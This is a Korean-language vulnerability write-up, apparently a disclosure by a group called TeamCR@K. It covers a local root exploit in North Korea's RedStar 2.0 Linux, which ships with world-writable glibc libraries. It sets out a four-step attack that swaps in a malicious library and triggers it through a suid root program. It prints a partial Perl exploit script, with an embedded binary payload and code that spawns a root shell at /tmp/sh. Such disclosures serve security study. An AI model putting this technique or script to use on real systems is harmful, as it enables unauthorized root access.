N.Korea RedStar 2.0 Incorrect permission local root exploit
TeamCR@K
개요
북한에서 개량하여 배포한 일명 ‘붉은별 리눅스’는 현재 2.0 버전까지 배포되는 것으로 알려지고 있으며, P2P 공유 사이트 등으로 다운로드 받아 설치 해 볼 수 있다. 해당 리눅스 OS 는 CD를 배포할 때 설정상의 문제점이 존재하여 이를 이용해 일반 사용자가 관리자 권한을 획득할 수 있다.
상세설명
리눅스 시스템은 보통 glibc라는 라이브러리 환경에 종속되는데, glibc 라이브러리 내에는 공유라이브러리(shared library)로 대표되는 라이브러리들이 포함된다. 보통 프로그램 기동 시, 많이 사용되는 대표적인 함수들의 구현은 전부 본 glibc의 공유라이브러리에서 담당하게 된다.
[그림 1] glibc 라이브러리에 포함되는 ‘C library functions’
(발췌: Advanced Programming in the Unix Environment)
위 그림에 표현되어 있는 ‘C library functions’가 바로 glibc 라이브러리의 역할을 나타내며 리눅스 시스템에서 kernel 다음으로 중요한 위치를 차지한다는 것을 알 수 있다. 이런 중요한 역할을 하는 glibc 라이브러리는 기본적으로 시스템 관리자(root)만 쓰고 지울 수 있는 권한을 갖게 되는데 ‘붉은별 리눅스’는 일반 사용자도 그 내용을 쓰고 지울 수 있게 되어 있어 이를 이용해 일반 사용자가 관리권한을 획득 할 수 있다.
본 라이브러리의 잘못된 설정권한을 이용해 일반 사용자가 관리자 권한을 획득 할 수 있는 시나리오로 다음과 같은 구상이 가능하다.
1. 악의적인 라이브러리 파일 생성
2. 해당 악의적인 라이브러리 파일의 내용과 실제 존재하는 라이브러리 파일의 내용을 치환
3. root권한의 suid bit가 설정되어 있으며, 악의적인 내용의 라이브러리 파일을 참조하는 프로그램을 실행
4. 관리자 권한 획득
다음은 위 시나리오를 자동화 한 프로그램 소스코드의 일부이다.
#!/usr/bin/perl
#
use Fcntl ":mode";
use IO::Handle;
my $banner = "RedStar 2.0 Linux (N.Korea) root exploit";
my $shellname = "/tmp/sh";
my @cfiles = ($target, $suidfile, "/usr/bin/bzip2");
my @perms = (S_IWOTH, S_ISUID, S_IXOTH);
my $bz2bin =
"\x42\x5A\x68\x39\x31\x41\x59\x26\x53\x59\x91\x83\xB7\xAB\x00\x04".
-- > snip <--
my $success = 0;
for($i = 0; $i < 60; $i++) {
print ".";
flush STDOUT;
if(($ret = permcheck($shellname, S_ISUID)) == 0) {
print "\n[*] Exploit successfully!\n";
$success = 1;
sleep 1;
system($shellname);
last;
}
sleep 1;
}
if($success == 0) {
print "\n[!] Exploit failed.\n";
}
cleanup:
print "[*] Cleanup!\n";
unlink($backupfile);
unlink($evil_bin);
if($success == 1) {
print "[*] A ROOT SHELL IS '$shellname'. DELETE IT YOURSELF!\n";
}
exit(0);
다음은 위 소스코드를 이용해 일반 사용자가 관리 권한을 획득하는 화면이다.
[그림 2] exploit을 이용해 일반 사용자가 관리권한을 획득하는 화면